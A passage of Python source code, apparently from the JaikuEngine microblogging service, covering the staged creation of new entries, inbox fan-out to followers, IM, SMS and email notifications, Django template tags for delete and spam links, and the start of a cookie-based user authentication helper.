return self.value
# BACKEND
# new squeuel
def _process_new_entry_with_progress(task_ref, actor_ref, new_stream_ref,
new_values, entry_ref=None,
entry_stream_ref=None):
""" this is probably one of the more complex pieces of machinery in the
entire codebase so we'll be being very liberal with comments
task_ref - the task we are currently processing
actor_ref - the actor who created the new entry
new_stream_ref - the stream in which the new entry is to be created
new_values - the values for the new entruy
entry_ref - if this is a new comment, the entry the new comment is on
entry_stream_ref - if this is a new comment, the stream of the entry the
new comment is on
"""
#logging.info("Processing task: %s %s %s p=%s",
# task_ref.actor,
# task_ref.action,
# task_ref.action_id,
# task_ref.progress
# )
# stages: entry - make the entry
# iterate inboxes
# actor inboxes
# follower inboxes
# iterate notifications
# First we need to figure out which stage we are in based on progress
progress = task_ref.progress
# FIRST STAGE: make the entry and initial inbox
# we'll also try to make the first set of followers
if not progress:
throttle.throttle(
actor_ref, task_ref.action, minute=10, hour=100, day=500, month=5000)
# every step of the way we try to do things in a way that will
# degrade best upon failure of any part, if these first three
# additions don't go through then there isn't really any entry
# and the user isn't going to see much until the queue picks
# it up
new_entry_ref = _add_entry(new_stream_ref,
new_values,
entry_ref=entry_ref)
# We're going to need this list all over so that we can remove it from
# the other inbox results we get after we've made the first one
initial_inboxes = _who_cares_web_initial(actor_ref,
new_entry_ref,
entry_ref)
# these are the most important first inboxes, they get the entry to show
# up for the user that made them and anybody who directly views the
# author's history
initial_inboxes_ref = _add_inbox(new_stream_ref,
new_entry_ref,
initial_inboxes,
shard='owner')
# we've accomplished something useful, bump our progress
# if this times out the above actions should all handle themselves well
# we leave the task locked because we hope to still get some more done
try:
task_ref = task_update(ROOT,
task_ref.actor,
task_ref.action,
task_ref.action_id,
progress='inboxes:',
unlock=False)
except exception.Error:
exception.log_exception()
# Next up will be the inboxes for the overviews of the first bunch
# of subscribers
follower_inboxes, more = _who_cares_web(new_entry_ref,
progress=progress,
skip=initial_inboxes)
last_inbox = _paged_add_inbox(follower_inboxes,
new_stream_ref,
new_entry_ref)
if not more:
# We don't have any more followers to add inboxes for but
# we don't really expect to be able to get the notifications
# out in this pass also so we're going to let the queue
# handle them
next_progress = 'notifications:'
else:
# Mark where we are and let the queue handle the rest
next_progress = 'inboxes:%s' % last_inbox
# Bump the task and chill out, unlock it for the next eager hands
try:
task_ref = task_update(ROOT,
task_ref.actor,
task_ref.action,
task_ref.action_id,
progress=next_progress,
unlock=True)
except exception.Error:
exception.log_exception()
# SECOND STAGE: more inboxes!
elif progress.startswith('inboxes:'):
# we'll need to get a reference to the entry that has already been created
entry_keyname = StreamEntry.key_from(**new_values)
new_entry_ref = entry_get(ROOT, entry_keyname)
# We're going to need this list all over so that we can remove it from
# the other inbox results we get after we've made the first one
initial_inboxes = _who_cares_web_initial(actor_ref,
new_entry_ref,
entry_ref)
my_progress = progress[len('inboxes:'):]
# More followers! Over and over. Like a monkey with a miniature cymbal.
follower_inboxes, more = _who_cares_web(new_entry_ref,
progress=my_progress,
skip=initial_inboxes)
last_inbox = _paged_add_inbox(follower_inboxes,
new_stream_ref,
new_entry_ref)
# if that was all of them, bump us up to notifications stage
if more and last_inbox:
next_progress = 'inboxes:%s' % last_inbox
else:
next_progress = 'notifications:'
try:
task_ref = task_update(ROOT,
task_ref.actor,
task_ref.action,
task_ref.action_id,
progress=next_progress,
unlock=True)
except exception.Error:
exception.log_exception()
# THIRD STAGE: notifications!
elif progress.startswith('notifications:'):
# We'll need to get a reference to the entry that has already been created
entry_keyname = StreamEntry.key_from(**new_values)
new_entry_ref = entry_get(ROOT, entry_keyname)
my_progress = progress[len('notifications:'):]
# SUBSTAGES! Oh my!
if not my_progress:
my_progress = 'im:'
if my_progress.startswith('im:'):
my_progress = my_progress[len('im:'):]
notification_type = 'im'
next_notification_type = 'sms'
initial_inboxes = _who_cares_im_initial(actor_ref,
new_entry_ref,
entry_ref)
follower_inboxes, more = _who_cares_im(new_entry_ref,
progress=my_progress,
skip=initial_inboxes)
# The first time through we'll want to include the initial inboxes, too
if not my_progress:
follower_inboxes = initial_inboxes + follower_inboxes
elif my_progress.startswith('sms:'):
my_progress = my_progress[len('sms:'):]
notification_type = 'sms'
next_notification_type = 'email'
initial_inboxes = _who_cares_sms_initial(actor_ref,
new_entry_ref,
entry_ref)
follower_inboxes, more = _who_cares_sms(new_entry_ref,
progress=my_progress,
skip=initial_inboxes)
# The first time through we'll want to include the initial inboxes, too
if not my_progress:
follower_inboxes = initial_inboxes + follower_inboxes
elif my_progress.startswith('email:'):
my_progress = my_progress[len('email:'):]
notification_type = 'email'
next_notification_type = None
initial_inboxes = _who_cares_email_initial(actor_ref,
new_entry_ref,
entry_ref)
follower_inboxes, more = _who_cares_email(new_entry_ref,
progress=my_progress,
skip=initial_inboxes)
# The first time through we'll want to include the initial inboxes, too
if not my_progress:
follower_inboxes = initial_inboxes + follower_inboxes
# Back to things that happen regardless of notification type
last_inbox = None
if follower_inboxes:
last_inbox = follower_inboxes[-1]
# We update the task first so that we don't accidentally send duplicate
# notifications, it's not ideal but best we can do for now
if more or next_notification_type:
if more and last_inbox:
next_progress = 'notifications:%s:%s' % (notification_type,
last_inbox)
else:
next_progress = 'notifications:%s:' % (next_notification_type)
try:
task_ref = task_update(ROOT,
task_ref.actor,
task_ref.action,
task_ref.action_id,
progress=next_progress,
unlock=True)
except exception.Error:
exception.log_exception()
# That's it! I can hardly believe it.
else:
task_remove(ROOT,
task_ref.actor,
task_ref.action,
task_ref.action_id
)
# perform the notifications
_notify_subscribers_for_entry_by_type(notification_type,
follower_inboxes,
actor_ref,
new_stream_ref,
new_entry_ref,
entry_ref=entry_ref,
entry_stream_ref=entry_stream_ref
)
return new_entry_ref
# TODO(termie): what a mess.
def _add_entry(new_stream_ref, new_values, entry_ref=None):
"""Adds an entry to a stream and returns the created StreamEntry object. """
# TODO should probably check for previous entries to prevent dupes here
# TODO check url for feed entries
# TODO check content for comments
# TODO check title for basic entries
# for presence updates, this looks like 'stream/<nick>/presence/NNNN'
key_name = StreamEntry.key_from(**new_values)
if entry_get_uuid(ROOT, new_values['uuid']):
raise exception.ApiException(
0x00, "Duplicate entry, uuid %s already used" % new_values['uuid'])
# Now the key is uuid and this check duplicates the above, but we will change
# the key to use the slug later.
try:
existing = entry_get(ROOT, key_name)
except exception.ApiDeleted:
existing = True
except exception.ApiException:
existing = False
if existing:
raise exception.ApiException(0x00, "Duplicate entry, key %s already used" %
key_name)
new_entry_ref = StreamEntry(**new_values)
new_entry_ref.put()
# TODO(termie): this can pretty easily get out of sync, we should probably
# do something like what we do with follower counts
if new_entry_ref.is_comment():
entry_ref.extra.setdefault('comment_count', 0)
entry_ref.extra['comment_count'] += 1
entry_ref.put()
# subscribe the author of the comment to future comments on this entry
# NOTE: using ROOT because if a user has already commented on this entry
# then they can see it to subscribe
subscripton_ref = subscription_request(
ROOT,
topic=entry_ref.keyname(),
target='inbox/%s/overview' % new_entry_ref.actor
)
else:
if not new_entry_ref.is_channel():
presence_set(ROOT,
new_entry_ref.actor,
presenceline={
'description': new_entry_ref.extra['title'],
'since': new_entry_ref.created_at})
return new_entry_ref
def _add_inbox(stream_ref, entry_ref, inboxes, shard):
#logging.info('add_inbox %s|%s: %s', entry_ref.keyname(), shard, inboxes)
values = {"stream": entry_ref.stream,
"stream_type": stream_ref.type,
"uuid": entry_ref.uuid,
"created_at": entry_ref.created_at,
"inbox": inboxes,
"shard": shard,
}
if entry_ref.entry:
values['entry'] = entry_ref.entry
inbox_ref = InboxEntry(**values)
inbox_ref.put()
return inbox_ref
def _who_cares_web(entry_ref, progress=None, limit=None, skip=None):
""" figure out who wants to see this on the web
From the who_cares diagram we want
Cs - comments on entries you wrote IGNORE already covered by initial_inboxes
Cx - comments entries you've commented on
Uu - user updates
Uc - channel updates
Cu - use comments
Twisting that around in terms of subscribers:
subscribers to the stream for this item: entry_ref.stream (Uu, Uc, Cu)
if this is a comment, subscribers to the entry: entry_ref.entry (Cx)
"""
limit = limit is None and MAX_FOLLOWERS_PER_INBOX or limit
topic_keys = [entry_ref.stream]
if entry_ref.is_comment():
topic_keys.append(entry_ref.entry)
entry_stream_ref = stream_get(ROOT, entry_ref.extra.get('entry_stream'))
actor_ref = actor_get(ROOT, entry_ref.actor)
is_restricted = (entry_stream_ref.is_restricted() or
actor_ref.is_restricted())
else:
stream_ref = stream_get(ROOT, entry_ref.stream)
is_restricted = stream_ref.is_restricted()
targets, more = _paged_targets_for_topics(topic_keys,
is_restricted,
progress=progress,
limit=limit)
if skip:
targets = [t for t in targets if t not in skip]
return targets, more
def _who_cares_web_initial(actor_ref, new_entry_ref, entry_ref=None):
inboxes = []
# actor-private
# actor-overview
# If this is a comment
# entry-comments
# entry-actor-overview
# If actor is public
# If not on a channel stream
# If on a public stream
# actor-contacts
# actor-public
#
# If this is not a comment
# If this is on a channel
# channel-private
# channel-contacts
# If channel is public:
# channel-public
# If not channel
# actor-contacts
# If actor is public
# actor-public
# root-explore
inboxes.append('inbox/%s/private' % new_entry_ref.actor)
inboxes.append('inbox/%s/overview' % new_entry_ref.actor)
if new_entry_ref.is_comment():
inboxes.append('%s/comments' % new_entry_ref.entry)
inboxes.append('inbox/%s/overview' % entry_ref.actor)
if actor_ref.is_public():
if not new_entry_ref.is_channel():
inboxes.append('inbox/%s/contacts' % new_entry_ref.actor)
inboxes.append('inbox/%s/public' % new_entry_ref.actor)
else:
if new_entry_ref.is_channel():
inboxes.append('inbox/%s/private' % new_entry_ref.owner)
inboxes.append('inbox/%s/contacts' % new_entry_ref.owner)
channel_ref = actor_get(ROOT, new_entry_ref.owner)
if channel_ref.is_public():
inboxes.append('inbox/%s/public' % new_entry_ref.owner)
else:
inboxes.append('inbox/%s/contacts' % new_entry_ref.actor)
if actor_ref.is_public():
inboxes.append('inbox/%s/public' % new_entry_ref.actor)
inboxes.append('inbox/%s/explore' % ROOT.nick)
return inboxes
def _who_cares_im(entry_ref, progress=None, limit=None, skip=None):
""" who cares about im? the same people as the web! """
limit = limit is None and MAX_NOTIFICATIONS_PER_TASK or limit
return _who_cares_web(entry_ref, progress=progress, limit=limit, skip=skip)
def _who_cares_im_initial(actor_ref, new_entry_ref, entry_ref):
return _who_cares_web_initial(actor_ref, new_entry_ref, entry_ref)
def _who_cares_email(entry_ref, progress=None, limit=None, skip=None):
""" figure out who wants to get an email about this
From the who_cares diagram we want
Cs - comments on entries you wrote IGNORE already covered by initial_inboxes
Cx - comments entries you've commented on
Twisting that around in terms of subscribers:
if this is a comment, subscribers to the entry: entry_ref.entry (Cx)
"""
limit = limit is None and MAX_NOTIFICATIONS_PER_TASK or limit
if not entry_ref.is_comment():
return [], None
topic_keys = []
topic_keys.append(entry_ref.entry)
entry_stream_ref = stream_get(ROOT, entry_ref.extra.get('entry_stream'))
is_restricted = entry_stream_ref.is_restricted()
targets, more = _paged_targets_for_topics(topic_keys,
is_restricted,
progress=progress,
limit=limit)
# we always want to skip the actor who made this action
# (unless we make that a setting in the future)
if not skip:
skip = []
skip.append('inbox/%s/overview' % entry_ref.actor)
targets = [t for t in targets if t not in skip]
return targets, more
def _who_cares_email_initial(actor_ref, new_entry_ref, entry_ref=None):
# If is a comment and not by the author of the entry it is on
# entry-actor-overview (Cs)
if new_entry_ref.is_comment() and new_entry_ref.actor != entry_ref.actor:
return ['inbox/%s/overview' % entry_ref.actor]
return []
def _who_cares_sms(entry_ref, progress=None, limit=None, skip=None):
""" figure out who wants to get an sms about this
From the who_cares diagram we want
Cs - comments on entries you wrote IGNORE already covered by initial_inboxes
Cx - comments entries you've commented on
Uu - user updates
Uc - channel updates
Twisting that around in terms of subscribers:
if not a comment, subscribers to the stream for this item:
entry_ref.stream (Uu, Uc, -Cu)
if this is a comment, subscribers to the entry: entry_ref.entry (Cx)
"""
limit = limit is None and MAX_NOTIFICATIONS_PER_TASK or limit
topic_keys = []
if entry_ref.is_comment():
topic_keys.append(entry_ref.entry)
entry_stream_ref = stream_get(ROOT, entry_ref.extra.get('entry_stream'))
actor_ref = actor_get(ROOT, entry_ref.actor)
is_restricted = (entry_stream_ref.is_restricted() or
actor_ref.is_restricted())
else:
topic_keys = [entry_ref.stream]
stream_ref = stream_get(ROOT, entry_ref.stream)
is_restricted = stream_ref.is_restricted()
targets, more = _paged_targets_for_topics(topic_keys,
is_restricted,
progress=progress,
limit=limit)
# we always want to skip the actor who made this action
# (unless we make that a setting in the future)
if not skip:
skip = []
skip.append('inbox/%s/overview' % entry_ref.actor)
targets = [t for t in targets if t not in skip]
return targets, more
def _who_cares_sms_initial(actor_ref, new_entry_ref, entry_ref=None):
# If is a comment and not by the author of the entry it is on
# entry-actor-overview (Cs)
if new_entry_ref.is_comment() and new_entry_ref.actor != entry_ref.actor:
return ['inbox/%s/overview' % entry_ref.actor]
return []
def _paged_targets_for_topics(topic_keys, is_restricted=True, progress=None,
limit=MAX_FOLLOWERS_PER_INBOX):
# If you're a little worried about how this works, hopefully this
# horrible little diagram will help ease your fears (or find out how
# we are doing it wrong and help us fix it)
#
# Example Time!
# We fetch the subscription targets for both the comments stream
# as well as for the entry, example:
#
# ............... ............... ...............
# limit = 4 limit = 4 limit = 4
# progress = None progress = D progress = H
# full data full data full data
# stream entry stream entry stream entry
# ------ ----- ------ ----- ------ -----
# A A A
# B B B B B B
# C C C
# D D D D D D
# E E E E E E
# F F F
# G G G
# H H H
# I I I
# J J J
# fetched data fetched data fetched data
# stream entry stream entry stream entry
# ------ ----- ------ ----- ------ -----
# A E E I
# B B F J
# C G
# D D H
# --- I
# E E J
# F
# G
# ---
# H
# I
# J
# merged more merged more merged more
# ------ ----- ------ ----- ------ -----
# A yes E yes I yes
# B F J
# C G
# D H
subs = []
for topic in topic_keys:
subs += subscription_get_topic(ROOT,
topic,
limit=limit +1,
offset=progress)
# unique and sort
targets = sorted(list(set([s.target for s in subs])))
#logging.info('targets! %s', targets)
# paging
more = False
if len(targets) > limit:
more = True
targets = targets[:limit]
# Alright, we've handled all that stuff described in the note above
# now we need to filter out the subscriptions that aren't subscribed
if is_restricted:
good_targets = [s.target for s in subs if (s.is_subscribed())]
targets = sorted(list(set(targets).intersection(set(good_targets))))
return targets, more
def _paged_add_inbox(inboxes, stream_ref, entry_ref):
if inboxes:
last_inbox = inboxes[-1]
# TODO(termie): maybe we should come up with a better shard identifier?
# theoretically, upon replay of this item the last item
# could change (a subscriber goes away) and we duplicate
# the inbox entry
inbox_ref = _add_inbox(stream_ref,
entry_ref,
inboxes,
shard=last_inbox)
return last_inbox
return None
# half squewl
def _notify_subscribers_for_entry_by_type(notification_type, inboxes,
actor_ref, new_stream_ref,
new_entry_ref, entry_ref=None,
entry_stream_ref=None):
# TODO(termie): this is not the most efficient way to do this at all
# it'd be nice if the subscription encoded the information
# about whether there should be im or sms delivery
# so that we at least have a smaller subset to work with
if notification_type == 'im':
_notify_im_for_entry(inboxes,
actor_ref,
new_stream_ref,
new_entry_ref,
entry_ref=entry_ref,
entry_stream_ref=entry_stream_ref)
elif notification_type == 'sms':
_notify_sms_for_entry(inboxes,
actor_ref,
new_stream_ref,
new_entry_ref,
entry_ref=entry_ref,
entry_stream_ref=entry_stream_ref)
elif notification_type == 'email':
_notify_email_for_entry(inboxes,
actor_ref,
new_stream_ref,
new_entry_ref,
entry_ref=entry_ref,
entry_stream_ref=entry_stream_ref)
def _notify_email_for_entry(inboxes, actor_ref, new_stream_ref, new_entry_ref,
entry_ref=None, entry_stream_ref=None):
if not new_entry_ref.is_comment():
return
subscribers = [util.get_user_from_topic(inbox) for inbox in inboxes]
subscribers = list(set(subscribers))
subscribers_ref = actor_get_actors(ROOT, subscribers)
subscribers_ref = [v for k, v in subscribers_ref.iteritems() if v]
_notify_email_subscribers_for_comment(subscribers_ref,
actor_ref,
new_entry_ref,
entry_ref)
def _notify_im_for_entry(inboxes, actor_ref, new_stream_ref, new_entry_ref,
entry_ref=None, entry_stream_ref=None):
subscribers = [util.get_user_from_topic(inbox) for inbox in inboxes]
subscribers = list(set(subscribers))
subscribers_ref = actor_get_actors(ROOT, subscribers)
subscribers_ref = [v for k, v in subscribers_ref.iteritems() if v]
# TODO(termie): merge these
if new_entry_ref.is_comment():
_notify_im_subscribers_for_comment(subscribers_ref,
actor_ref,
new_entry_ref,
entry_ref)
else:
_notify_im_subscribers_for_entry(subscribers_ref,
actor_ref,
entry_stream_ref,
new_entry_ref)
def _notify_sms_for_entry(inboxes, actor_ref, new_stream_ref, new_entry_ref,
entry_ref=None, entry_stream_ref=None):
subscribers = [util.get_user_from_topic(inbox) for inbox in inboxes]
subscribers = list(set(subscribers))
subscribers_ref = actor_get_actors(ROOT, subscribers)
subscribers_ref = [v for k, v in subscribers_ref.iteritems() if v]
mobile_numbers = []
for subscriber_ref in subscribers_ref:
if not subscriber_ref.extra.get('sms_notify'):
continue
mobile = mobile_get_actor(ROOT, subscriber_ref.nick)
if not mobile:
continue
mobile_numbers.append(mobile)
if not mobile_numbers:
return
sms_connection = sms.SmsConnection()
if new_entry_ref.is_comment():
template = '%s^%s: %s'
title = entry_ref.title()
firsts = smashed_title_re.findall(title)
smashed_title = ''.join(firsts[:6])
content = new_entry_ref.extra.get('content', '')
if len(content) > 200:
content = content[:20] + '...'
message = template % (actor_ref.display_nick(), smashed_title, content)
reply_key = entry_ref.keyname()
else:
template = '%s: %s'
content = new_entry_ref.title()
if len(content) > 200:
content = content[:20] + '...'
message = template % (actor_ref.display_nick(), content)
reply_key = new_entry_ref.keyname()
sms_connection.send_message(mobile_numbers, message)
_reply_add_cache_sms(actor_ref, subscribers_ref, reply_key)
# old skewl
def _subscribers_for_entry(stream_ref, entry_ref):
"""
Computes the list of streams that should be updated when a post is made.
Returns the list.
"""
# the users subscribed to the stream this entry is going to
subscribers = subscription_get_topic(ROOT, stream_ref.key().name())
if stream_is_private(ROOT, stream_ref.key().name()):
# LEGACY COMPAT: the 'or' in there is for legacy compat
subscribers = [s.target for s in subscribers
if (s.state == 'subscribed' or s.state == None)]
else:
subscribers = [s.target for s in subscribers]
# the explore page if this isn't a comment
if stream_ref.type != 'comment' and not stream_ref.owner.startswith('#'):
subscribers.append('inbox/%s/explore' % ROOT.nick)
# the views of the entry owner
if stream_ref.read > PRIVACY_CONTACTS:
subscribers.append('inbox/%s/public' % entry_ref.owner)
if stream_ref.read > PRIVACY_PRIVATE:
subscribers.append('inbox/%s/contacts' % entry_ref.owner)
subscribers.append('inbox/%s/private' % entry_ref.owner)
subscribers.append('inbox/%s/overview' % entry_ref.owner)
subscribers = list(set(subscribers))
return subscribers
def _subscribers_for_comment(comments_stream_ref, stream_ref,
entry_ref, comment_ref):
# the users subscribed to the user's comment stream
subscribers = subscription_get_topic(ROOT, comments_stream_ref.key().name())
if stream_is_private(ROOT, stream_ref.key().name()):
# LEGACY COMPAT: the 'or' in there is for legacy compat
subscribers = [s.target for s in subscribers
if (s.state == 'subscribed' or s.state == None)]
else:
subscribers = [s.target for s in subscribers]
# the users subscribed to this entry (commenters)
entry_subscribers = subscription_get_topic(ROOT, entry_ref.key().name())
subscribers += [s.target
for s in entry_subscribers
if s.state == 'subscribed']
# the entry this is on
subscribers.append(entry_ref.key().name() + "/comments")
# the views of this commenter, only if entry is public
if (comments_stream_ref.read > PRIVACY_CONTACTS and
stream_ref.read > PRIVACY_CONTACTS):
subscribers.append('inbox/%s/public' % comment_ref.actor)
if (comments_stream_ref.read > PRIVACY_PRIVATE and
stream_ref.read > PRIVACY_CONTACTS):
subscribers.append('inbox/%s/contacts' % comment_ref.actor)
# the private views of the commenter
subscribers.append('inbox/%s/private' % comment_ref.actor)
subscribers.append('inbox/%s/overview' % comment_ref.actor)
# the overview of the entry owner (for channels) and actor
subscribers.append('inbox/%s/overview' % entry_ref.owner)
subscribers.append('inbox/%s/overview' % entry_ref.actor)
subscribers = list(set(subscribers))
return subscribers
def _add_inboxes_for_entry(inboxes, stream_ref, entry_ref):
values = {"stream": entry_ref.stream,
"stream_type": stream_ref.type,
"uuid": entry_ref.uuid,
"created_at": entry_ref.created_at,
"inbox": inboxes,
"shard": inboxes[-1],
}
if entry_ref.entry:
values['entry'] = entry_ref.entry
inbox_entry = InboxEntry(**values)
inbox_entry.put()
return inbox_entry
def _notify_subscribers_for_entry(inboxes, actor_ref, stream_ref,
entry_ref):
subscribers = [util.get_user_from_topic(inbox) for inbox in inboxes]
subscribers = list(set(subscribers))
subscribers_ref = actor_get_actors(ROOT, subscribers)
subscribers_ref = [v for k, v in subscribers_ref.iteritems() if v]
_notify_im_subscribers_for_entry(subscribers_ref,
actor_ref,
stream_ref,
entry_ref)
def _notify_subscribers_for_comment(actor_ref, comment_ref, entry_ref):
# get the list of subscribers to this entry (owner and commenters)
inboxes = ['inbox/%s/overview' % entry_ref.actor]
entry_subscribers = subscription_get_topic(ROOT, entry_ref.key().name())
inboxes += [s.target
for s in entry_subscribers
if s.state == 'subscribed']
subscribers = [util.get_user_from_topic(inbox) for inbox in inboxes]
subscribers = list(set(subscribers))
subscribers_ref = actor_get_actors(ROOT, subscribers)
subscribers_ref = [v for k, v in subscribers_ref.iteritems() if v]
_notify_email_subscribers_for_comment(subscribers_ref,
actor_ref,
comment_ref,
entry_ref)
_notify_im_subscribers_for_comment(subscribers_ref,
actor_ref,
comment_ref,
entry_ref)
def _notify_email_subscribers_for_comment(subscribers_ref, actor_ref,
comment_ref, entry_ref):
for subscriber_ref in subscribers_ref:
if not subscriber_ref.extra.get('email_notify'):
continue
email = email_get_actor(ROOT, subscriber_ref.nick)
if not email:
continue
if subscriber_ref.nick == actor_ref.nick:
continue
subject, message = mail.email_comment_notification(
subscriber_ref,
actor_ref,
comment_ref,
entry_ref)
email_send(ROOT, email, subject, message)
def _notify_im_subscribers_for_comment(subscribers_ref, actor_ref,
comment_ref, entry_ref):
xmpp_connection = xmpp.XmppConnection()
im_aliases = []
for subscriber_ref in subscribers_ref:
if not subscriber_ref.extra.get('im_notify'):
continue
im = im_get_actor(ROOT, subscriber_ref.nick)
if not im:
continue
im_aliases.append(im)
if not im_aliases:
return
# TODO(termie): add more info if this is a channel
# TODO(termie): add link to post
excerpt = entry_ref.title()
if len(excerpt) > 24:
excerpt = excerpt[:20] + u"\u2026"
content = comment_ref.extra.get('content', '')
# TODO(termie): support html messages
message = '%s: %s (on %s)' % (actor_ref.display_nick(), content, excerpt)
xmpp_connection.send_message(im_aliases, message)
_reply_add_cache_im(actor_ref, subscribers_ref, entry_ref.keyname())
def _notify_im_subscribers_for_entry(subscribers_ref, actor_ref, stream_ref, entry_ref):
xmpp_connection = xmpp.XmppConnection()
im_aliases = []
for subscriber_ref in subscribers_ref:
if not subscriber_ref.extra.get('im_notify'):
continue
im = im_get_actor(ROOT, subscriber_ref.nick)
if not im:
continue
im_aliases.append(im)
if not im_aliases:
return
# TODO(termie): add link to post
excerpt = entry_ref.title()
from_nick = actor_ref.display_nick()
# if this is a channel add more info
if entry_ref.owner != entry_ref.actor:
owner_ref = actor_get(ROOT, entry_ref.owner)
from_nick += owner_ref.display_nick()
# TODO(termie): support html messages
message = '%s: %s' % (from_nick, excerpt)
xmpp_connection.send_message(im_aliases, message)
_reply_add_cache_im(actor_ref, subscribers_ref, entry_ref.keyname())
def _notify_new_contact(owner_ref, target_ref):
if not target_ref.extra.get('email_notify'):
return
email = email_get_actor(ROOT, target_ref.nick)
if not email:
return
# using ROOT for internal functionality
mutual = actor_has_contact(ROOT, target_ref.nick, owner_ref.nick)
if mutual:
subject, message, html_message = mail.email_new_follower_mutual(
owner_ref, target_ref)
else:
subject, message, html_message = mail.email_new_follower(
owner_ref, target_ref)
email_send(ROOT, email, subject, message, html_message=html_message)
# Helpers for replying via @nick
def _reply_cache_key(sender, target, service=''):
memcache_key = 'reply/%s/%s/%s' % (service, sender, target)
return memcache_key
def _reply_add_cache(sender_ref, target_refs, entry, service=''):
"""Add an entry in the memcache, matching each outgoing IM message
from a given actor to a set of actors, so that reply-by-IM works
with '@actor comment' syntax.
PARAMETERS:
sender_ref - actor who posted the entry
target_refs - list of actors receiving notification
entry - key for the entry posted
"""
memcache_entry = {}
for target_ref in target_refs:
memcache_key = _reply_cache_key(sender_ref.nick,
target_ref.nick,
service=service)
memcache_entry[memcache_key] = entry
memcache.client.set_multi(memcache_entry)
def _reply_add_cache_im(sender_ref, target_refs, entry):
return _reply_add_cache(sender_ref, target_refs, entry, service='im')
def _reply_add_cache_sms(sender_ref, target_refs, entry):
return _reply_add_cache(sender_ref, target_refs, entry, service='sms')
def reply_get_cache(sender, target, service=''):
""" get the last entry from sender seen by target on service
Note: this has a somewhat misleading signature, it is generally called
in the processing of an @nick post, in which case the target is the
user making the post and the sender is the @nick.
"""
entry_ref = None
sender_ref = actor_lookup_nick(ROOT, sender)
target_ref = actor_lookup_nick(ROOT, target)
memcache_key = _reply_cache_key(sender_ref.nick,
target_ref.nick,
service=service)
stream_key = memcache.client.get(memcache_key)
if stream_key:
entry_ref = entry_get(ROOT, stream_key)
if not entry_ref:
# TODO(termie): should work for non-public users too
inbox = inbox_get_actor_public(sender_ref,
target_ref.nick,
limit=1,
stream_type='presence')
if not inbox:
logging.info('NO INBOX!')
return
logging.info('aa %s', inbox)
entry_ref = entry_get(sender_ref, inbox[0])
return entry_ref
def _email_from_subscribers_for_comment(subscribers):
"""From a set of subscribers, get the actors.
PARAMETERS:
subscribers - returned from _subscribers_for_*
RETURNS:
[email] -- list of email aliases
"""
aliases = {}
for subscriber in subscribers:
actor = util.get_user_from_topic(subscriber)
email = email_get_actor(ROOT, actor)
# Not all actors want email updates.
if email:
# TODO(tyler): Not just if they have an email registered, but specifically
# if they have the bit flipped for wanting email.
aliases[email] = 1
return aliases.keys()
def _set_presence(api_user, **kw):
pass
# HELPER
def _limit_query(query, limit, offset):
o = []
query_it = query.run()
for i in xrange(limit + offset):
try:
x = query_it.next()
except StopIteration:
break
o.append(x)
return o[offset:(offset+limit)]
def _crop_to_square(size, dimensions):
sq = dimensions[0]
w = size[0]
h = size[1]
if size[0] > size[1]:
left_x = (size[0] - sq) / 2
right_x = left_x + sq
top_y = 0
bottom_y = sq
else:
left_x = 0
right_x = sq
top_y = (size[1] - sq) / 2
bottom_y = top_y + sq
return (float(left_x) / w, float(top_y) / h,
float(right_x) / w, float(bottom_y) / h)
```
#### File: common/templatetags/entry.py
```python
__author__ = '<EMAIL> (<NAME>)'
import urllib
from django import template
from django.template.defaultfilters import stringfilter
import django.template.defaulttags
from django.utils.safestring import mark_safe
from django.utils.html import escape
from common.util import create_nonce, safe
from common import messages
from common.templatetags.base import if_pred
import settings
register = template.Library()
def is_actor_or_owner(user, entry, is_admin = False):
if is_admin:
return True
if not user:
return False
return user.nick == entry.actor or user.nick == entry.owner
def is_not_actor(user, entry, is_admin = None):
if not user:
return False
return user.nick != entry.actor
@register.tag
def if_actor_or_owner(parser, token):
return if_pred(parser, token, is_actor_or_owner)
@register.tag
def if_not_actor(parser, token):
return if_pred(parser, token, is_not_actor)
class EntryActionNode(template.Node):
def __init__(self, var_user, var_entry, is_admin, pred, api_call, link_class, content):
self.var_user = template.Variable(var_user)
self.var_entry = template.Variable(var_entry)
self.var_is_admin = None
try:
template.Variable(is_admin)
except:
pass
self.pred = pred
self.api_call = api_call
self.link_class = link_class
if not isinstance(content, template.Node):
self.content = template.TextNode(content)
else:
self.content = content
def render(self, context):
user = self.var_user.resolve(context)
entry = self.var_entry.resolve(context)
is_admin = None
try:
is_admin = self.var_is_admin.resolve(context)
except:
pass
if self.pred(user, entry, is_admin):
content = self.content.render(context)
return (
('<a href="?%s=%s&_nonce=%s"' +
' class="%s" title="%s">%s</a>') % (
self.api_call, urllib.quote(entry.keyname()),
create_nonce(user, self.api_call),
self.link_class, escape(messages.title(self.api_call)),
content))
else:
return ''
def entry_remove_x(parser, token, api_call):
bits = list(token.split_contents())
is_admin = None
if len(bits) != 3 and len(bits) != 4:
raise template.TemplateSyntaxError, "%r takes two or three arguments" % bits[0]
if len(bits) == 4:
is_admin = bits[3]
return EntryActionNode(bits[1], bits[2], is_admin, is_actor_or_owner,
api_call, 'confirm-delete', 'Delete')
@register.tag
def entry_remove(parser, token):
"""
Adds a Delete link for a post.
Parameters: viewer, entry, is_admin.
"""
return entry_remove_x(parser, token, 'entry_remove')
@register.tag
def entry_remove_comment(parser, token):
"""
Adds a Delete link for a comment.
Parameters: viewer, entry.
"""
return entry_remove_x(parser, token, 'entry_remove_comment')
@register.tag
def entry_mark_as_spam(parser, token):
"""
Adds a Mark as spam link for a post or comment.
Parameters: viewer, entry.
"""
if not settings.MARK_AS_SPAM_ENABLED:
return django.template.defaulttags.CommentNode()
bits = list(token.split_contents())
is_admin = None
if len(bits) != 3:
raise template.TemplateSyntaxError, "%r takes two arguments" % bits[0]
return EntryActionNode(bits[1], bits[2], is_admin, is_not_actor,
'entry_mark_as_spam', 'confirm-spam', 'Mark as spam')
```
#### File: jaikuengine/common/user.py
```python
import datetime
import logging
from django.conf import settings
from django.core.cache import cache
import oauth.oauth as oauth
from common import api
from common import exception
from common import legacy
from common import oauth_util
from common import util
def get_user_from_request(request):
"""attempt to get a logged in user based on the request
most likely from a cookie
"""
nick = request.COOKIES.get(settings.USER_COOKIE, None)
token = request.COOKIES.get(settings.PASSWORD_COOKIE, None)
if nick:
# try to authenticate the dude via cookie
user = authenticate_user_cookie(nick, token)
return user
if (settings.API_ALLOW_LEGACY_AUTH
and 'personal_key' in request.REQUEST
and 'user' in request.REQUEST):
user = legacy.authenticate_user_personal_key(
request.REQUEST['user'], request.REQUEST['personal_key'])
if user:
user.legacy = True
return user
# we may not be authenticating via cookie, check oauth also
# Note: This will have the effect that any valid OAuth request
# will effectively be treated as a logged in user with one
# small difference, api users (via OAuth, etc) are given
# a permission level of read, write or delete which limits
